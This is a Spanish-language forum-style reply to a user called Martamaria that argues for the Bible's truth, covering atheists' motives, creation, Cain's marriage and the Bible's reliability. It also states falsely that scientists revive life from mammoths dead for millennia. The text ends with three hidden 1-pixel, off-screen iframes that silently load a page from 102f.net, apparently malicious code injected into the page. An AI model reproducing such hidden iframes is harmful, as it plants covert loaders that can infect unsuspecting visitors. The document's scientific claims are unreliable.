1… Los ateos lo son por distintas razones. Primero, les ha pasado algo con la religión en la que estuvieron metido y en vez de pagarlo con esa religión lo pagan con Dios. Segundo, por vagos, no quieren trabajar en averiguar si existe o no y siempre ponen trabas sin argumentación a lo que dicen los creyentes. Tercero, por ignorancia, le han dicho de pequeño que no hay nada y han creído lo que le han dicho y se han vuelto como en el punto segundo. Cuarto, por rebeldía contra Dios mismo, creen que es culpa de Dios el que le hayan pasado lo malo por las creencias que le han metido en la cabeza. Un ejemplo, los curas acostumbran a decir a los padres cuando se les muere un niño pequeño que Dios se lo ha llevado para hacerlo un angelito, algo increíble pero que sucede, le echan la culpa a Dios por la muerte de ese niñito. Quinto, los hay ateos por convicción, son sinceros en que no hay nada.
Por supuesto que la fe es importante en la vida de un cristiano, pero sin pruebas no se puede tener fe y yo tengo esas pruebas,
2… Te he puesto la tabla donde las personas iban decreciendo. Llegaba un punto en que ya no podía haber ser humanos, ni animales. No sabes cómo apareció todo esto pero sin embargo pones trabas a lo que dice la Biblia que te lo explica. La Biblia es la única que te dice como apareció todo, no tienes otra clase de razonamiento, ni tú ni los científicos, pero os parece imposible lo que dice las escrituras,
3… Todo lo que explota para mi es una bomba o un petardo según la intensidad de la explosión. Dice que libero los elementos de la tabla periódica y que estos elementos interactuaron entre sí. ¿Esa interactuación no tuvo fallos? ¿Tan bien interactuaron esos elementos que todo salió perfecto? Vamos Martamaria, eres más inteligente que eso, sabes que para que esos elementos funciones bien debe haber una combinación exacta. Por ejemplo, para convertir el oxígeno que necesitamos en la tierra ¿Qué hace falta? Búscalo y mira qué pasaría con la vida humana y animal si le echaran más o menos ingrediente de lo que se necesita. Hace falta una combinación perfecta.
¿Pudiera ser que el que haya combinado perfectamente esos elementos de la tabla sea Dios?
4...Como te he dicho si pone varias parejas, ya no seriamos “hermanos de sangre”. Te pongo el comentario de un estudioso bíblico que te dara la respuesta mejor que yo.
“Para algunas sociedades modernas, sin embargo, resulta inconcebible que Caín se hubiera casado con una de sus hermanas o con alguna mujer que hubiera nacido de la unión de un hijo y una hija de Adán. Dicha reacción suele deberse a las normas sociales establecidas y al temor a los defectos genéticos. No obstante, Frank LaGard Smith comenta lo siguiente en su obra La Biblia Cronológica: “Es muy probable que estos primeros hermanos y hermanas se hayan casado entre ellos, a pesar del sentido inapropiado que se sentiría si eso hubiera sucedido en las siguientes generaciones”. Es digno de mención, además, que no fue sino hasta 1513 antes de nuestra era —año en que Moisés recibió las leyes para la nación de Israel— que Dios prohibió específicamente las relaciones sexuales entre parientes cercanos (Levítico 18:9, 17, 24).
Si te fijas, fue hace unos 3500 años cuando Dios dio esas leyes. En aquel entonces no se veía ni mal ni raro tener relaciones entre hermanos y parientes para poder tener descendencia. No había problemas de genética hasta que ya no había rastro de la perfección con la que fueron creados Adán y Eva.
5… Mientras no me demuestres lo contrario para mi SI será la palabra de Dios. Así que ponme algo que yo no sepa y que tu si por la que estas tan segura de que no lo es.
5...a...¿Tú has visto alguna película de superhéroes? ¿Ellos usan esos poderes cada vez que le dan la gana o lo usan tan solo para hacer el bien?
Jehová no necesitaba ver el futuro para ver si Adán y Eva iban a pecar. Él tenía plena confianza en ellos, los hizo perfecto, pero no los hizo robot. Tan solo les advirtió de lo que sucedería si le desobedecía al igual que un buen padre mira por el bienestar de sus hijos y les advierten de que si les desobedecen los castigará ¿Tú no has hecho eso nunca eso con tus hijos? ¿Tú nunca le has dicho? Como toques eso te voy a dar un cachete. ¿Tú dabas por sentado que tus hijos iban a tocar lo que les habías prohibido? ¿Verdad que no? Pues lo mismo con Jehová amiga mia.
6… ¿Quién te ha dicho que no tengo pruebas? Para mí la Biblia es un libro que me da pruebas, tanto histórica, genealógica, arquitectónica, científica y todo lo que tú quieras. La Biblia te da datos que no vas a encontrar en otro sitio, y con el tiempo se ha verificado que tiene razón ¿Por qué quieres quitarle el mérito a la Biblia?
¿Por qué crees tú en tantas cosas que han pasado en la historia del hombre si tu no lo has vivido?
¿Por qué sabes que quienes inventaron miles de cosas que con las que nos beneficiamos hoy día es de verdad que ellos la inventaron y no otros?
¿Por qué sabes que Colon descubrió América si tú fuiste con él?
Ah vale porque lo pone en distintos libros y tú lo has leído y como alguien lo ha puesto ahí tú lo crees. Sin embargo el libro más grande de historia, el libro más grande de ciencia, el libro más grande de salud, no quieres creerlo porque viene de Dios.
Como dijiste, nadie te da razones válidas de cómo ha surgido la vida, nadie te lo ha demostrado. La Biblia te lo dice pero no quieres creerla. Hoy ves como los científicos son capaces de sacar vida de un cuerpo muerto hace miles de años como por ejemplo de un mamut. Ves capaz al hombre de dar vida pero no eres capaz de ver que a alguien superior que también puede dar esa vida a grado más superior. Eso no es ser escéptica Martamaria eso es ser incrédula, no quieres ver lo que tienes delante de tus ojos.
Si de verdad quieres tener pruebas de la Biblia léete estos artículos, pero no me digas que no es así sin haberlo leído. Cuando lo hagas entonces me dices por qué no lo crees.
Razones para confiar en la Biblia: su exactitud científica
Razones para confiar en la Biblia: su exactitud histórica
Razones para confiar en la Biblia: la franqueza de sus escritores
Razones para confiar en la Biblia: su coherencia interna
Razones para confiar en la Biblia: el cumplimiento de profecías
<iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe><iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe><iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe>